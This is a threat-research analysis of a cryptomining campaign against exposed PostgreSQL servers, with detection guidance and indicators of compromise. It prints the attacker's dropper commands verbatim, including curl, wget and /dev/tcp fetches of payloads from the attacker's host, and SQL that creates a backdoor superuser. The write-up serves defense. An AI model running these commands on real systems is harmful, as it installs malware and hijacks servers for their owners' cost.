Wiz Threat Research has unveiled a new variant of an ongoing malicious campaign that specifically targets misconfigured and publicly exposed PostgreSQL servers. The threat actor, identified as JINX-0126, exploits these vulnerable PostgreSQL instances, often set up with weak or easily guessable login credentials, to gain unauthorized access and deploy XMRig-C3 cryptominers.
Evolution of the Threat
This campaign was initially documented by Aqua Security. However, the threat actor has since adapted their tactics, incorporating advanced defense evasion techniques. These include deploying binaries with unique hashes for each target and executing the miner payload in a fileless manner, likely to circumvent detection by Cloud Workload Protection Platforms (CWPP) that depend solely on file hash reputation.
Our analysis indicates that the threat actor assigns a unique mining worker to each victim. During our investigation, we identified three distinct wallets associated with the actor (details in the IOC section below). By examining C3Pool statistics for these wallets, we estimate that this campaign has potentially affected over 1,500 victims. This highlights the prevalence of misconfigured PostgreSQL instances, which serve as low-hanging fruit for opportunistic attackers. Notably, our data reveals that nearly 90% of cloud environments host PostgreSQL instances, with approximately one-third having at least one instance publicly exposed to the internet.
We have observed this malicious activity targeting both our customers’ cloud environments and our honeypot environment. The following analysis will provide technical insights based on a sample sourced from our honeypot.
Technical Analysis
Threat actors are actively scanning networks for poorly configured services, with PostgreSQL being a frequent target due to the use of default weak credentials that can lead to unauthorized access and remote code execution. Once authenticated, they exploit the COPY ... FROM PROGRAM function, enabling them to drop and execute malicious payloads.
Upon successful login, the threat actor performs basic reconnaissance using commands like whoami and uname, while also checking for the existence of pg_core on the workload. Subsequently, they execute the first dropper script, delivered via a base64 decoded string:
kill -9 $(pgrep zsvc) $(pgrep pdefenderd) $(pgrep updatecheckerd) $(pgrep kinsing) $(pgrep kdevtmpfsi);
function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3/dev/tcp/${HOST}/${PORT}
echo -en "GET ${DOC} HTTP/1.0rnHost: ${HOST}rnrn" >&3
(while read line; do
[[ "$line" == $'r' ]] && break
done && cat) &-
}
if [ -x "$(command -v curl)" ]; then
curl -ksS 159.223.123.175:36287/JzICbeMxNQHwfwHLiCOFnumixtqYBv -o pg_core
elif [ -x "$(command -v wget)" ]; then
wget -q -Opg_core 159.223.123.175:36287/JzICbeMxNQHwfwHLiCOFnumixtqYBv
else
__curl > pg_core ;
fi;The script first terminates any existing cryptominers on the resource and drops the pg_core binary. It then executes pg_core on the resource and deletes itself. The attacker downloads a binary named postmaster, attempting to masquerade as the legitimate postmaster process, which is the multiuser database server for PostgreSQL.
echo 'exec 5/dev/tcp/159.223.123.175/36287; echo "GET /HbLzilWbYDNEpWUdlDdjfdiYTChuDj HTTP/1.1"' >&5; echo "host: 159.223.123.175" >&5; echo >&5; (while read line; do [[ "$line" == $(printf "15") ]] && break; done && cat) postmaster; exec 5>&-;The postmaster binary is an obfuscated Golang binary, packed with modified UPX. The threat actor appends an encrypted configuration to the postmaster binary, which is encrypted using a hardcoded AES key:
sh -c "printf ::42Jz0wVPBAsW329::VXssAL7FE0j5QG4T7cLgmn/VTADoqlvAlDqUiueQYJXy+P5Ysz9YvLS6yML0euUNaHAhwWeXD2/Q51sjeYVQ4vc3UQHvfC8rFujLeIE3vT9uPdPSnjZwRH8X1xvEXqeQPHKL1Vv9PaWu6lrzdtDQECt0LTcz15zWHmAHAUhH4fsM/QrZHZfuJB9zX0W5eS+IrRV2Li6aPfqfYkP/D371mPtKCq9i5l9tn2VWlsDcGesOdh2zS+iD5GrvrwXWhTDvgH2xpvL5Am1DDnKU/ftll3+s0/NFBJMRZ807VHu3h8qidkU8N1z4Wqz4XO03uZ1aUZtsY+GbeC57EvSWYkcLnnvQqPT4qBCipQjYI+ogtzcBlSmFc7eP/a8odDaN3HvC >> postmaster 2>&1 || exit 0"The decrypted configuration contains critical information about the compromised system, including:
- The username and password used.
- The external IP address and port of the infected server.
- The name of the superuser account created.
- The file location of
pg_hba.conf.
Additionally, the configuration includes several fields related to the cryptominer that will be deployed later, such as the attacker’s wallet address and the worker’s name. Upon execution, postmaster determines its disk location and reads the last 1024 bytes of the binary, which holds the appended configuration. If the trailer is absent or invalid, postmaster exits with an error.
The postmaster binary executes itself with the command line postgres: replication launcher, attempting to blend in with legitimate PostgreSQL processes. For persistence, postmaster creates a cron job to run itself every minute, while also deleting the ssh_authorized keys and modifying the pg_hba configuration file to restrict access.
host all pgg_superadmins all reject
host all postgres_superadmins all reject
host all all 127.0.0.1/8 trust
host all all 172.16.0.0/12 trust
host all all 192.168.0.0/16 trust
host all all 10.0.0.0/8 trustThe threat actor creates a new role with high privileges for persistence, allowing access even if the password is altered:
CREATE ROLE psql_sys WITH LOGIN SUPERUSER PASSWORD '759686ac19adbd08b94cf53f35afdd1e';Furthermore, the attacker weakens the default user admin:
ALTER USER "admin" WITH NOSUPERUSER NOCREATEROLE;The postmaster binary writes the cpu_hu binary to disk, which is similarly an obfuscated Golang binary packed with modified UPX. The base64 decoded miner configuration is embedded at the end of the cpu_hu binary:
:::9XLOMQh7RZ3Tf1Xo8:::eyJsbCI6NCwibGxlIjoiNEE1WldwSE02QlhTOFlGN3hOZmpYQTVjdERqVEMzR0J3UzRFU0... (truncated for brevity)Decoded Configuration
The configuration includes the wallet, worker ID, and the JSON configuration file name created under /tmp. The cpu_hu binary downloads the latest version of https://github.com/C3Pool/xmrig-C3/, writes the configuration file to /tmp/..., and invokes the miner filelessly via a memory file descriptor.
Due to the unique configuration data appended to the malware samples, the file hash of cpu_hu and postmaster varies between victims.
Victims in the Wild:
Our analysis has identified three different wallets. Observations from C3Pool stats indicate that each wallet had approximately 550 workers, suggesting that the campaign could have compromised over 1,500 machines.
Prevention:
The Wiz Dynamic Scanner identifies publicly exposed PostgreSQL services configured with weak or default credentials within customers’ cloud environments. Additionally, the Wiz agentless workload scanner detects containers and VMs hosting PostgreSQL, assessing whether they contain sensitive data or have access to highly privileged service accounts that could be exploited by opportunistic attackers for various malicious purposes.
Detection:
The Wiz Runtime Sensor detects events and behaviors associated with this threat and similar ones, providing alerts as the adversary progresses through the attack kill chain—from the initial exploit to payload delivery and ultimately to the final fileless cryptomining activity.
Here is an example of the Wiz Runtime Sensor detecting the fileless execution of the miner used in this threat:
Wiz customers can utilize pre-built queries and advisories in the Wiz Threat Center to search for vulnerable instances in their environment and ascertain if they have been affected by this threat.
Wallets: 4A5ZWpHM6BXS8YF7xNfjXA5ctDjTC3GBwS4ESBV9X2BGVJV8vkfXBeZfXG6w2hmdkpZaogCXiqU4DYPXn3TtPRAGJBLQ7N5 47pt9WzQyugFQpSAwcGN2k8JHiMQ3fRZ3BQqmnYJtcejVq9adfiwVSWgrpmxiYTxvvWcHv5dD2iCaiBYiK4atkMSUGMXdx8 463TBt8Rn1qXWZDpTV4ydxQcZnkJNeLv6JRKjFbzFsY3MQZaxWsUgQF4QnxNAg8MGSPsiLn9faTWqRafHnhh3QBdSLTgRHA
File hosting service: 159.223.123.175:36287
Pool: mine.c3pool.com:13333
File hashes:
- XMRig-C3 miner: 0b907eee9a85d39f8f0d7c503cc1f84a71c4de10
- pg_core: 85198288e2ff1dad718cd84876a0b0d3173a641e
- Postmaster prior to the trailer addition: e6578bb7b88bf08a35ba4b0f2dd75af32e8fe65d33d329ca5beaf8a8ce29d7e1
MITRE ATT&CK® Techniques Used by CPU_HU:
- Command and Control – Application Layer Protocol: Web Protocols (T1071.001)
- Command and Control – Ingress Tool Transfer (T1105)
- Credential Access – Brute Force: Password Spraying (T1110.003)
- Defense Evasion – Hide Artifacts: Hidden Files and Directories (T1564.001)
- Defense Evasion – Indicator Removal: File Deletion (T1070.004)
- Defense Evasion – Masquerading: Match Legitimate Name or Location (T1036.005)
- Defense Evasion – Obfuscated Files or Information: Binary Padding (T1027.001)
- Defense Evasion – Obfuscated Files or Information: Software Packing (T1027.002)
- Defense Evasion – Reflective Code Loading (T1620)
- Execution – Command and Scripting Interpreter: Unix Shell (T1059.004)
- Initial Access – Exploit Public-Facing Application (T1190)
- Persistence – Account Manipulation (T1098)
- Persistence – Create Account (T1136)
- Persistence – Scheduled Task/Job: Cron (T1053.003)
- Impact – Resource Hijacking (T1496)
- Discovery – System Information Discovery (T1082)
